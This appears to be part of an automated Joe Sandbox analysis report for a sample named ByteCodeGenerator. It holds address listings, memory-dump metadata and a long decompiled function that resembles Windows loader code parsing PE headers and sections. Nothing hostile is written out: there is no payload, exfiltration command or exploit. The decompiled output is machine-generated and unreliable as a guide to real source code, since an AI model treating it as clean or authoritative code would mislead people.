                                  0x034521ee
                                  0x034521f1
                                  0x03495a45
                                  0x03495a4b
                                  0x03495a52
                                  0x03495a58
                                  0x03495a5d
                                  0x03495a5f
                                  0x03495a71
                                  0x03495a61
                                  0x03495a6a
                                  0x03495a6a
                                  0x03495a76
                                  0x03495a79
                                  0x03495a7f
                                  0x03495a83
                                  0x03495a85
                                  0x03495a87
                                  0x03495a87
                                  0x03495a8c
                                  0x03495a91
                                  0x03495a97
                                  0x03495a9f
                                  0x03495aa0
                                  0x03495aa1
                                  0x03495aa6
                                  0x03495aab
                                  0x03495ab1
                                  0x03495ab3
                                  0x03495ab9
                                  0x03495aca
                                  0x03495ad4
                                  0x03495ad4
                                  0x03495ade
                                  0x03495ade
                                  0x03495aab
                                  0x03495a79
                                  0x03495a52
                                  0x034521f7
                                  0x034521f9
                                  0x034521fe
                                  0x034521fe
                                  0x034521e3
                                  0x03452195
                                  0x0345236c
                                  0x03452122
                                  0x03452122
                                  0x03452124
                                  0x03452231
                                  0x03452236
                                  0x03452236
                                  0x03452238
                                  0x03452238
                                  0x03452240
                                  0x03452242
                                  0x03452244
                                  0x034959fc
                                  0x0345218c
                                  0x0345218c
                                  0x00000000
                                  0x0345218c
                                  0x0345224a
                                  0x0345224f
                                  0x03452256
                                  0x03452304
                                  0x03452309
                                  0x0345230f
                                  0x0345231e
                                  0x0345231e
                                  0x0345231e
                                  0x03452320
                                  0x03452325
                                  0x0345232a
                                  0x0345232c
                                  0x0345233e
                                  0x0345233e
                                  0x00000000
                                  0x0345232c
                                  0x03452311
                                  0x03452317
                                  0x0345231a
                                  0x0345231c
                                  0x03452380
                                  0x03452380
                                  0x03452380
                                  0x03452384
                                  0x00000000
                                  0x00000000
                                  0x03452386
                                  0x00000000
                                  0x0345231c
                                  0x0345225c
                                  0x0345225c
                                  0x00000000
                                  0x0345225c
                                  0x0345212a
                                  0x03452134
                                  0x03452138
                                  0x0345213d
                                  0x03495858
                                  0x03495863
                                  0x03495863
                                  0x03495867
                                  0x0349586a
                                  0x00000000
                                  0x00000000
                                  0x0349586c
                                  0x0349586c
                                  0x03495871
                                  0x03495875
                                  0x03495877
                                  0x03495997
                                  0x0349599c
                                  0x034959a1
                                  0x034959a7
                                  0x034959a7
                                  0x00000000
                                  0x034959a7
                                  0x0349587d
                                  0x00000000
                                  0x0349588b
                                  0x0349588b
                                  0x03495890
                                  0x03495892
                                  0x03495894
                                  0x03495899
                                  0x0349589b
                                  0x034958a0
                                  0x034958a0
                                  0x034958aa
                                  0x034958b2
                                  0x034958b6
                                  0x034958be
                                  0x034958c6
                                  0x034958c9
                                  0x0349590d
                                  0x03495917
                                  0x0349591a
                                  0x0349591c
                                  0x03495920
                                  0x03495928
                                  0x0349592a
                                  0x0349592c
                                  0x0349592e
                                  0x0349592e
                                  0x034958cb
                                  0x034958cd
                                  0x034958d8
                                  0x034958e0
                                  0x034958f4
                                  0x034958fe
                                  0x034958fe
                                  0x0349593a
                                  0x0349593e
                                  0x03495940
                                  0x03495942
                                  0x00000000
                                  0x03495944
                                  0x03495944
                                  0x03495949
                                  0x0349594e
                                  0x0349594e
                                  0x03495953
                                  0x0349595b
                                  0x03495976
                                  0x03495976
                                  0x0349597a
                                  0x0349597f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03495981
                                  0x03495981
                                  0x03495981
                                  0x03495983
                                  0x03495988
                                  0x0349598d
                                  0x03495991
                                  0x03495991
                                  0x00000000
                                  0x0349595d
                                  0x0349595d
                                  0x03495963
                                  0x03495965
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03495967
                                  0x03495967
                                  0x0349596b
                                  0x0349596d
                                  0x00000000
                                  0x00000000
                                  0x0349596f
                                  0x03495971
                                  0x03495971
                                  0x03495974
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03495974
                                  0x00000000
                                  0x03495967
                                  0x0349595b
                                  0x03495942
                                  0x03495863
                                  0x03452143
                                  0x03452143
                                  0x03452149
                                  0x0345214f
                                  0x034522f1
                                  0x034522f6
                                  0x00000000
                                  0x03452173
                                  0x03452173
                                  0x0345217d
                                  0x03452181
                                  0x03452186
                                  0x034959ae
                                  0x034959b2
                                  0x034959b5
                                  0x034959b7
                                  0x034959ba
                                  0x034959cd
                                  0x034959d1
                                  0x034959d5
                                  0x034959d9
                                  0x034959db
                                  0x00000000
                                  0x00000000
                                  0x034959dd
                                  0x034959dd
                                  0x034959e1
                                  0x034959e4
                                  0x034959e7
                                  0x034959ee
                                  0x034959ee
                                  0x034959f3
                                  0x034959f3
                                  0x00000000
                                  0x03452186
                                  0x0345214f
                                  0x03452106
                                  0x03452266
                                  0x034520d8
                                  0x034520da
                                  0x034520e0
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 20388268f35e589214519a3855abd47e4a1665fe23142585307d1f67e3d0b63e
                                  • Instruction ID: 075c0cf5f91dc77dcf705e553518f5176f3f62fc3233cf52d94e274217b2efca
                                  • Opcode Fuzzy Hash: 20388268f35e589214519a3855abd47e4a1665fe23142585307d1f67e3d0b63e
                                  • Instruction Fuzzy Hash: F7F1D335A083059FEB26CB28C44072BBBE5AB85314F18899FFC959F351D774D841CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E0343D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                  				signed int _v8;
                                  				intOrPtr _v20;
                                  				signed int _v36;
                                  				intOrPtr* _v40;
                                  				signed int _v44;
                                  				signed int _v48;
                                  				signed char _v52;
                                  				signed int _v60;
                                  				signed int _v64;
                                  				signed int _v68;
                                  				signed int _v72;
                                  				signed int _v76;
                                  				intOrPtr _v80;
                                  				signed int _v84;
                                  				intOrPtr _v100;
                                  				intOrPtr _v104;
                                  				signed int _v108;
                                  				signed int _v112;
                                  				signed int _v116;
                                  				intOrPtr _v120;
                                  				signed int _v132;
                                  				char _v140;
                                  				char _v144;
                                  				char _v157;
                                  				signed int _v164;
                                  				signed int _v168;
                                  				signed int _v169;
                                  				intOrPtr _v176;
                                  				signed int _v180;
                                  				signed int _v184;
                                  				intOrPtr _v188;
                                  				signed int _v192;
                                  				signed int _v200;
                                  				signed int _v208;
                                  				intOrPtr* _v212;
                                  				char _v216;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t204;
                                  				void* _t208;
                                  				signed int _t211;
                                  				signed int _t216;
                                  				intOrPtr _t217;
                                  				intOrPtr* _t218;
                                  				signed int _t226;
                                  				signed int _t239;
                                  				signed int* _t247;
                                  				signed int _t249;
                                  				void* _t252;
                                  				signed int _t256;
                                  				signed int _t269;
                                  				signed int _t271;
                                  				signed int _t277;
                                  				signed int _t279;
                                  				intOrPtr _t283;
                                  				signed int _t287;
                                  				signed int _t288;
                                  				void* _t289;
                                  				signed char _t290;
                                  				signed int _t292;
                                  				signed int* _t293;
                                  				signed int _t306;
                                  				signed int _t307;
                                  				signed int _t308;
                                  				signed int _t309;
                                  				signed int _t310;
                                  				intOrPtr _t311;
                                  				intOrPtr _t312;
                                  				signed int _t319;
                                  				signed int _t320;
                                  				signed int* _t324;
                                  				signed int _t337;
                                  				signed int _t338;
                                  				signed int _t339;
                                  				signed int* _t340;
                                  				void* _t341;
                                  				signed int _t344;
                                  				signed int _t348;
                                  				signed int _t349;
                                  				signed int _t351;
                                  				intOrPtr _t353;
                                  				void* _t354;
                                  				signed int _t356;
                                  				signed int _t358;
                                  				intOrPtr _t359;
                                  				signed int _t363;
                                  				signed short* _t365;
                                  				void* _t367;
                                  				intOrPtr _t369;
                                  				void* _t370;
                                  				signed int _t371;
                                  				signed int _t372;
                                  				void* _t374;
                                  				signed int _t376;
                                  				void* _t384;
                                  				signed int _t387;
                                  
                                  				_v8 =  *0x351d360 ^ _t376;
                                  				_t2 =  &_a20;
                                  				 *_t2 = _a20 & 0x00000001;
                                  				_t287 = _a4;
                                  				_v200 = _a12;
                                  				_t365 = _a8;
                                  				_v212 = _a16;
                                  				_v180 = _a24;
                                  				_v168 = 0;
                                  				_v157 = 0;
                                  				if( *_t2 != 0) {
                                  					__eflags = E03436600(0x35152d8);
                                  					if(__eflags == 0) {
                                  						goto L1;
                                  					} else {
                                  						_v188 = 6;
                                  					}
                                  				} else {
                                  					L1:
                                  					_v188 = 9;
                                  				}
                                  				if(_t365 == 0) {
                                  					_v164 = 0;
                                  					goto L5;
                                  				} else {
                                  					_t363 =  *_t365 & 0x0000ffff;
                                  					_t341 = _t363 + 1;
                                  					if((_t365[1] & 0x0000ffff) < _t341) {
                                  						L109:
                                  						__eflags = _t341 - 0x80;
                                  						if(_t341 <= 0x80) {
                                  							_t281 =  &_v140;
                                  							_v164 =  &_v140;
                                  							goto L114;
                                  						} else {
                                  							_t283 =  *0x3517b9c; // 0x0
                                  							_t281 = L03444620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                  							_v164 = _t281;
                                  							__eflags = _t281;
                                  							if(_t281 != 0) {
                                  								_v157 = 1;
                                  								L114:
                                  								E0346F3E0(_t281, _t365[2], _t363);
                                  								_t200 = _v164;
                                  								 *((char*)(_v164 + _t363)) = 0;
                                  								goto L5;
                                  							} else {
                                  								_t204 = 0xc000009a;
                                  								goto L47;
                                  							}
                                  						}
                                  					} else {
                                  						_t200 = _t365[2];
                                  						_v164 = _t200;
                                  						if( *((char*)(_t200 + _t363)) != 0) {
                                  							goto L109;
                                  						} else {
                                  							while(1) {
                                  								L5:
                                  								_t353 = 0;
                                  								_t342 = 0x1000;
                                  								_v176 = 0;
                                  								if(_t287 == 0) {
                                  									break;
                                  								}
                                  								_t384 = _t287 -  *0x3517b90; // 0x77cf0000
                                  								if(_t384 == 0) {
                                  									_t353 =  *0x3517b8c; // 0xca2a70
                                  									_v176 = _t353;
                                  									_t320 = ( *(_t353 + 0x50))[8];
                                  									_v184 = _t320;
                                  								} else {
                                  									E03442280(_t200, 0x35184d8);
                                  									_t277 =  *0x35185f4; // 0xca2f60
                                  									_t351 =  *0x35185f8 & 1;
                                  									while(_t277 != 0) {
                                  										_t337 =  *(_t277 - 0x50);
                                  										if(_t337 > _t287) {
                                  											_t338 = _t337 | 0xffffffff;
                                  										} else {
                                  											asm("sbb ecx, ecx");
                                  											_t338 =  ~_t337;
                                  										}
                                  										_t387 = _t338;
                                  										if(_t387 < 0) {
                                  											_t339 =  *_t277;
                                  											__eflags = _t351;
                                  											if(_t351 != 0) {
                                  												__eflags = _t339;
                                  												if(_t339 == 0) {
                                  													goto L16;
                                  												} else {
                                  													goto L118;
                                  												}
                                  												goto L151;
                                  											} else {
                                  												goto L16;
                                  											}
                                  											goto L17;
                                  										} else {
                                  											if(_t387 <= 0) {
                                  												__eflags = _t277;
                                  												if(_t277 != 0) {
                                  													_t340 =  *(_t277 - 0x18);
                                  													_t24 = _t277 - 0x68; // 0xca2ef8
                                  													_t353 = _t24;
                                  													_v176 = _t353;
                                  													__eflags = _t340[3] - 0xffffffff;
                                  													if(_t340[3] != 0xffffffff) {
                                  														_t279 =  *_t340;
                                  														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                  														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                  															asm("lock inc dword [edi+0x9c]");
                                  															_t340 =  *(_t353 + 0x50);
                                  														}
                                  													}
                                  													_v184 = _t340[8];
                                  												}
                                  											} else {
                                  												_t339 =  *(_t277 + 4);
                                  												if(_t351 != 0) {
                                  													__eflags = _t339;
                                  													if(_t339 == 0) {
                                  														goto L16;
                                  													} else {
                                  														L118:
                                  														_t277 = _t277 ^ _t339;
                                  														goto L17;
                                  													}
                                  													goto L151;
                                  												} else {
                                  													L16:
                                  													_t277 = _t339;
                                  												}
                                  												goto L17;
                                  											}
                                  										}
                                  										goto L25;
                                  										L17:
                                  									}
                                  									L25:
                                  									E0343FFB0(_t287, _t353, 0x35184d8);
                                  									_t320 = _v184;
                                  									_t342 = 0x1000;
                                  								}
                                  								if(_t353 == 0) {
                                  									break;
                                  								} else {
                                  									_t366 = 0;
                                  									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                  										_t288 = _v164;
                                  										if(_t353 != 0) {
                                  											_t342 = _t288;
                                  											_t374 = E0347CC99(_t353, _t288, _v200, 1,  &_v168);
                                  											if(_t374 >= 0) {
                                  												if(_v184 == 7) {
                                  													__eflags = _a20;
                                  													if(__eflags == 0) {
                                  														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                  														if(__eflags != 0) {
                                  															_t271 = E03436600(0x35152d8);
                                  															__eflags = _t271;
                                  															if(__eflags == 0) {
                                  																_t342 = 0;
                                  																_v169 = _t271;
                                  																_t374 = E03437926( *(_t353 + 0x50), 0,  &_v169);
                                  															}
                                  														}
                                  													}
                                  												}
                                  												if(_t374 < 0) {
                                  													_v168 = 0;
                                  												} else {
                                  													if( *0x351b239 != 0) {
                                  														_t342 =  *(_t353 + 0x18);
                                  														E034AE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                  													}
                                  													if( *0x3518472 != 0) {
                                  														_v192 = 0;
                                  														_t342 =  *0x7ffe0330;
                                  														asm("ror edi, cl");
                                  														 *0x351b1e0( &_v192, _t353, _v168, 0, _v180);
                                  														 *( *0x351b218 ^  *0x7ffe0330)();
                                  														_t269 = _v192;
                                  														_t353 = _v176;
                                  														__eflags = _t269;
                                  														if(__eflags != 0) {
                                  															_v168 = _t269;
                                  														}
                                  													}
                                  												}
                                  											}
                                  											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                  												_t366 = 0xc000007a;
                                  											}
                                  											_t247 =  *(_t353 + 0x50);
                                  											if(_t247[3] == 0xffffffff) {
                                  												L40:
                                  												if(_t366 == 0xc000007a) {
                                  													__eflags = _t288;
                                  													if(_t288 == 0) {
                                  														goto L136;
                                  													} else {
                                  														_t366 = 0xc0000139;
                                  													}
                                  													goto L54;
                                  												}
                                  											} else {
                                  												_t249 =  *_t247;
                                  												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                  													goto L40;
                                  												} else {
                                  													_t250 = _t249 | 0xffffffff;
                                  													asm("lock xadd [edi+0x9c], eax");
                                  													if((_t249 | 0xffffffff) == 0) {
                                  														E03442280(_t250, 0x35184d8);
                                  														_t342 =  *(_t353 + 0x54);
                                  														_t165 = _t353 + 0x54; // 0x54
                                  														_t252 = _t165;
                                  														__eflags =  *(_t342 + 4) - _t252;
                                  														if( *(_t342 + 4) != _t252) {
                                  															L135:
                                  															asm("int 0x29");
                                  															L136:
                                  															_t288 = _v200;
                                  															_t366 = 0xc0000138;
                                  															L54:
                                  															_t342 = _t288;
                                  															L03463898(0, _t288, _t366);
                                  														} else {
                                  															_t324 =  *(_t252 + 4);
                                  															__eflags =  *_t324 - _t252;
                                  															if( *_t324 != _t252) {
                                  																goto L135;
                                  															} else {
                                  																 *_t324 = _t342;
                                  																 *(_t342 + 4) = _t324;
                                  																_t293 =  *(_t353 + 0x50);
                                  																_v180 =  *_t293;
                                  																E0343FFB0(_t293, _t353, 0x35184d8);
                                  																__eflags =  *((short*)(_t353 + 0x3a));
                                  																if( *((short*)(_t353 + 0x3a)) != 0) {
                                  																	_t342 = 0;
                                  																	__eflags = 0;
                                  																	E034637F5(_t353, 0);
                                  																}
                                  																E03460413(_t353);
                                  																_t256 =  *(_t353 + 0x48);
                                  																__eflags = _t256;
                                  																if(_t256 != 0) {
                                  																	__eflags = _t256 - 0xffffffff;
                                  																	if(_t256 != 0xffffffff) {
                                  																		E03459B10(_t256);
                                  																	}
                                  																}
                                  																__eflags =  *(_t353 + 0x28);
                                  																if( *(_t353 + 0x28) != 0) {
                                  																	_t174 = _t353 + 0x24; // 0x24
                                  																	E034502D6(_t174);
                                  																}
                                  																L034477F0( *0x3517b98, 0, _t353);
                                  																__eflags = _v180 - _t293;
                                  																if(__eflags == 0) {
                                  																	E0345C277(_t293, _t366);
                                  																}
                                  																_t288 = _v164;
                                  																goto L40;
                                  															}
                                  														}
                                  													} else {
                                  														goto L40;
                                  													}
                                  												}
                                  											}
                                  										}
                                  									} else {
                                  										L0343EC7F(_t353);
                                  										L034519B8(_t287, 0, _t353, 0);
                                  										_t200 = E0342F4E3(__eflags);
                                  										continue;
                                  									}
                                  								}
                                  								L41:
                                  								if(_v157 != 0) {
                                  									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                  								}
                                  								if(_t366 < 0 || ( *0x351b2f8 |  *0x351b2fc) == 0 || ( *0x351b2e4 & 0x00000001) != 0) {
                                  									L46:
                                  									 *_v212 = _v168;
                                  									_t204 = _t366;
                                  									L47:
                                  									_pop(_t354);
                                  									_pop(_t367);
                                  									_pop(_t289);
                                  									return E0346B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                  								} else {
                                  									_v200 = 0;
                                  									if(( *0x351b2ec >> 0x00000008 & 0x00000003) == 3) {
                                  										_t355 = _v168;
                                  										_t342 =  &_v208;
                                  										_t208 = E034D6B68(_v168,  &_v208, _v168, __eflags);
                                  										__eflags = _t208 - 1;
                                  										if(_t208 == 1) {
                                  											goto L46;
                                  										} else {
                                  											__eflags = _v208 & 0x00000010;
                                  											if((_v208 & 0x00000010) == 0) {
                                  												goto L46;
                                  											} else {
                                  												_t342 = 4;
                                  												_t366 = E034D6AEB(_t355, 4,  &_v216);
                                  												__eflags = _t366;
                                  												if(_t366 >= 0) {
                                  													goto L46;
                                  												} else {
                                  													asm("int 0x29");
                                  													_t356 = 0;
                                  													_v44 = 0;
                                  													_t290 = _v52;
                                  													__eflags = 0;
                                  													if(0 == 0) {
                                  														L108:
                                  														_t356 = 0;
                                  														_v44 = 0;
                                  														goto L63;
                                  													} else {
                                  														__eflags = 0;
                                  														if(0 < 0) {
                                  															goto L108;
                                  														}
                                  														L63:
                                  														_v112 = _t356;
                                  														__eflags = _t356;
                                  														if(_t356 == 0) {
                                  															L143:
                                  															_v8 = 0xfffffffe;
                                  															_t211 = 0xc0000089;
                                  														} else {
                                  															_v36 = 0;
                                  															_v60 = 0;
                                  															_v48 = 0;
                                  															_v68 = 0;
                                  															_v44 = _t290 & 0xfffffffc;
                                  															E0343E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                  															_t306 = _v68;
                                  															__eflags = _t306;
                                  															if(_t306 == 0) {
                                  																_t216 = 0xc000007b;
                                  																_v36 = 0xc000007b;
                                  																_t307 = _v60;
                                  															} else {
                                  																__eflags = _t290 & 0x00000001;
                                  																if(__eflags == 0) {
                                  																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                  																	__eflags = _t349 - 0x10b;
                                  																	if(_t349 != 0x10b) {
                                  																		__eflags = _t349 - 0x20b;
                                  																		if(_t349 == 0x20b) {
                                  																			goto L102;
                                  																		} else {
                                  																			_t307 = 0;
                                  																			_v48 = 0;
                                  																			_t216 = 0xc000007b;
                                  																			_v36 = 0xc000007b;
                                  																			goto L71;
                                  																		}
                                  																	} else {
                                  																		L102:
                                  																		_t307 =  *(_t306 + 0x50);
                                  																		goto L69;
                                  																	}
                                  																	goto L151;
                                  																} else {
                                  																	_t239 = L0343EAEA(_t290, _t290, _t356, _t366, __eflags);
                                  																	_t307 = _t239;
                                  																	_v60 = _t307;
                                  																	_v48 = _t307;
                                  																	__eflags = _t307;
                                  																	if(_t307 != 0) {
                                  																		L70:
                                  																		_t216 = _v36;
                                  																	} else {
                                  																		_push(_t239);
                                  																		_push(0x14);
                                  																		_push( &_v144);
                                  																		_push(3);
                                  																		_push(_v44);
                                  																		_push(0xffffffff);
                                  																		_t319 = E03469730();
                                  																		_v36 = _t319;
                                  																		__eflags = _t319;
                                  																		if(_t319 < 0) {
                                  																			_t216 = 0xc000001f;
                                  																			_v36 = 0xc000001f;
                                  																			_t307 = _v60;
                                  																		} else {
                                  																			_t307 = _v132;
                                  																			L69:
                                  																			_v48 = _t307;
                                  																			goto L70;
                                  																		}
                                  																	}
                                  																}
                                  															}
                                  															L71:
                                  															_v72 = _t307;
                                  															_v84 = _t216;
                                  															__eflags = _t216 - 0xc000007b;
                                  															if(_t216 == 0xc000007b) {
                                  																L150:
                                  																_v8 = 0xfffffffe;
                                  																_t211 = 0xc000007b;
                                  															} else {
                                  																_t344 = _t290 & 0xfffffffc;
                                  																_v76 = _t344;
                                  																__eflags = _v40 - _t344;
                                  																if(_v40 <= _t344) {
                                  																	goto L150;
                                  																} else {
                                  																	__eflags = _t307;
                                  																	if(_t307 == 0) {
                                  																		L75:
                                  																		_t217 = 0;
                                  																		_v104 = 0;
                                  																		__eflags = _t366;
                                  																		if(_t366 != 0) {
                                  																			__eflags = _t290 & 0x00000001;
                                  																			if((_t290 & 0x00000001) != 0) {
                                  																				_t217 = 1;
                                  																				_v104 = 1;
                                  																			}
                                  																			_t290 = _v44;
                                  																			_v52 = _t290;
                                  																		}
                                  																		__eflags = _t217 - 1;
                                  																		if(_t217 != 1) {
                                  																			_t369 = 0;
                                  																			_t218 = _v40;
                                  																			goto L91;
                                  																		} else {
                                  																			_v64 = 0;
                                  																			E0343E9C0(1, _t290, 0, 0,  &_v64);
                                  																			_t309 = _v64;
                                  																			_v108 = _t309;
                                  																			__eflags = _t309;
                                  																			if(_t309 == 0) {
                                  																				goto L143;
                                  																			} else {
                                  																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                  																				__eflags = _t226 - 0x10b;
                                  																				if(_t226 != 0x10b) {
                                  																					__eflags = _t226 - 0x20b;
                                  																					if(_t226 != 0x20b) {
                                  																						goto L143;
                                  																					} else {
                                  																						_t371 =  *(_t309 + 0x98);
                                  																						goto L83;
                                  																					}
                                  																				} else {
                                  																					_t371 =  *(_t309 + 0x88);
                                  																					L83:
                                  																					__eflags = _t371;
                                  																					if(_t371 != 0) {
                                  																						_v80 = _t371 - _t356 + _t290;
                                  																						_t310 = _v64;
                                  																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                  																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                                  																						_t311 = 0;
                                  																						__eflags = 0;
                                  																						while(1) {
                                  																							_v120 = _t311;
                                  																							_v116 = _t348;
                                  																							__eflags = _t311 - _t292;
                                  																							if(_t311 >= _t292) {
                                  																								goto L143;
                                  																							}
                                  																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                  																							__eflags = _t371 - _t359;
                                  																							if(_t371 < _t359) {
                                  																								L98:
                                  																								_t348 = _t348 + 0x28;
                                  																								_t311 = _t311 + 1;
                                  																								continue;
                                  																							} else {
                                  																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                  																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                  																									goto L98;
                                  																								} else {
                                  																									__eflags = _t348;
                                  																									if(_t348 == 0) {
                                  																										goto L143;
                                  																									} else {
                                  																										_t218 = _v40;
                                  																										_t312 =  *_t218;
                                  																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                  																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                  																											_v100 = _t359;
                                  																											_t360 = _v108;
                                  																											_t372 = L03438F44(_v108, _t312);
                                  																											__eflags = _t372;
                                  																											if(_t372 == 0) {
                                  																												goto L143;
                                  																											} else {
                                  																												_t290 = _v52;
                                  																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03463C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                  																												_t307 = _v72;
                                  																												_t344 = _v76;
                                  																												_t218 = _v40;
                                  																												goto L91;
                                  																											}
                                  																										} else {
                                  																											_t290 = _v52;
                                  																											_t307 = _v72;
                                  																											_t344 = _v76;
                                  																											_t369 = _v80;
                                  																											L91:
                                  																											_t358 = _a4;
                                  																											__eflags = _t358;
                                  																											if(_t358 == 0) {
                                  																												L95:
                                  																												_t308 = _a8;
                                  																												__eflags = _t308;
                                  																												if(_t308 != 0) {
                                  																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                  																												}
                                  																												_v8 = 0xfffffffe;
                                  																												_t211 = _v84;
                                  																											} else {
                                  																												_t370 =  *_t218 - _t369 + _t290;
                                  																												 *_t358 = _t370;
                                  																												__eflags = _t370 - _t344;
                                  																												if(_t370 <= _t344) {
                                  																													L149:
                                  																													 *_t358 = 0;
                                  																													goto L150;
                                  																												} else {
                                  																													__eflags = _t307;
                                  																													if(_t307 == 0) {
                                  																														goto L95;
                                  																													} else {
                                  																														__eflags = _t370 - _t344 + _t307;
                                  																														if(_t370 >= _t344 + _t307) {
                                  																															goto L149;
                                  																														} else {
                                  																															goto L95;
                                  																														}
                                  																													}
                                  																												}
                                  																											}
                                  																										}
                                  																									}
                                  																								}
                                  																							}
                                  																							goto L97;
                                  																						}
                                  																					}
                                  																					goto L143;
                                  																				}
                                  																			}
                                  																		}
                                  																	} else {
                                  																		__eflags = _v40 - _t307 + _t344;
                                  																		if(_v40 >= _t307 + _t344) {
                                  																			goto L150;
                                  																		} else {
                                  																			goto L75;
                                  																		}
                                  																	}
                                  																}
                                  															}
                                  														}
                                  														L97:
                                  														 *[fs:0x0] = _v20;
                                  														return _t211;
                                  													}
                                  												}
                                  											}
                                  										}
                                  									} else {
                                  										goto L46;
                                  									}
                                  								}
                                  								goto L151;
                                  							}
                                  							_t288 = _v164;
                                  							_t366 = 0xc0000135;
                                  							goto L41;
                                  						}
                                  					}
                                  				}
                                  				L151:
                                  			}





































































































                                  0x0343d5f2
                                  0x0343d5f5
                                  0x0343d5f5
                                  0x0343d5fd
                                  0x0343d600
                                  0x0343d60a
                                  0x0343d60d
                                  0x0343d617
                                  0x0343d61d
                                  0x0343d627
                                  0x0343d62e
                                  0x0343d911
                                  0x0343d913
                                  0x00000000
                                  0x0343d919
                                  0x0343d919
                                  0x0343d919
                                  0x0343d634
                                  0x0343d634
                                  0x0343d634
                                  0x0343d634
                                  0x0343d640
                                  0x0343d8bf
                                  0x00000000
                                  0x0343d646
                                  0x0343d646
                                  0x0343d64d
                                  0x0343d652
                                  0x0348b2fc
                                  0x0348b2fc
                                  0x0348b302
                                  0x0348b33b
                                  0x0348b341
                                  0x00000000
                                  0x0348b304
                                  0x0348b304
                                  0x0348b319
                                  0x0348b31e
                                  0x0348b324
                                  0x0348b326
                                  0x0348b332
                                  0x0348b347
                                  0x0348b34c
                                  0x0348b351
                                  0x0348b35a
                                  0x00000000
                                  0x0348b328
                                  0x0348b328
                                  0x00000000
                                  0x0348b328
                                  0x0348b326
                                  0x0343d658
                                  0x0343d658
                                  0x0343d65b
                                  0x0343d665
                                  0x00000000
                                  0x0343d66b
                                  0x0343d66b
                                  0x0343d66b
                                  0x0343d66b
                                  0x0343d66d
                                  0x0343d672
                                  0x0343d67a
                                  0x00000000
                                  0x00000000
                                  0x0343d680
                                  0x0343d686
                                  0x0343d8ce
                                  0x0343d8d4
                                  0x0343d8dd
                                  0x0343d8e0
                                  0x0343d68c
                                  0x0343d691
                                  0x0343d69d
                                  0x0343d6a2
                                  0x0343d6a7
                                  0x0343d6b0
                                  0x0343d6b5
                                  0x0343d6e0
                                  0x0343d6b7
                                  0x0343d6b7
                                  0x0343d6b9
                                  0x0343d6b9
                                  0x0343d6bb
                                  0x0343d6bd
                                  0x0343d6ce
                                  0x0343d6d0
                                  0x0343d6d2
                                  0x0348b363
                                  0x0348b365
                                  0x00000000
                                  0x0348b36b
                                  0x00000000
                                  0x0348b36b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0343d6bf
                                  0x0343d6bf
                                  0x0343d6e5
                                  0x0343d6e7
                                  0x0343d6e9
                                  0x0343d6ec
                                  0x0343d6ec
                                  0x0343d6ef
                                  0x0343d6f5
                                  0x0343d6f9
                                  0x0343d6fb
                                  0x0343d6fd
                                  0x0343d701
                                  0x0343d703
                                  0x0343d70a
                                  0x0343d70a
                                  0x0343d701
                                  0x0343d710
                                  0x0343d710
                                  0x0343d6c1
                                  0x0343d6c1
                                  0x0343d6c6
                                  0x0348b36d
                                  0x0348b36f
                                  0x00000000
                                  0x0348b375
                                  0x0348b375
                                  0x0348b375
                                  0x00000000
                                  0x0348b375
                                  0x00000000
                                  0x0343d6cc
                                  0x0343d6d8
                                  0x0343d6d8
                                  0x0343d6d8
                                  0x00000000
                                  0x0343d6c6
                                  0x0343d6bf
                                  0x00000000
                                  0x0343d6da
                                  0x0343d6da
                                  0x0343d716
                                  0x0343d71b
                                  0x0343d720
                                  0x0343d726
                                  0x0343d726
                                  0x0343d72d
                                  0x00000000
                                  0x0343d733
                                  0x0343d739
                                  0x0343d742
                                  0x0343d750
                                  0x0343d758
                                  0x0343d764
                                  0x0343d776
                                  0x0343d77a
                                  0x0343d783
                                  0x0343d928
                                  0x0343d92c
                                  0x0343d93d
                                  0x0343d944
                                  0x0343d94f
                                  0x0343d954
                                  0x0343d956
                                  0x0343d95f
                                  0x0343d961
                                  0x0343d973
                                  0x0343d973
                                  0x0343d956
                                  0x0343d944
                                  0x0343d92c
                                  0x0343d78b
                                  0x0348b394
                                  0x0343d791
                                  0x0343d798
                                  0x0348b3a3
                                  0x0348b3bb
                                  0x0348b3bb
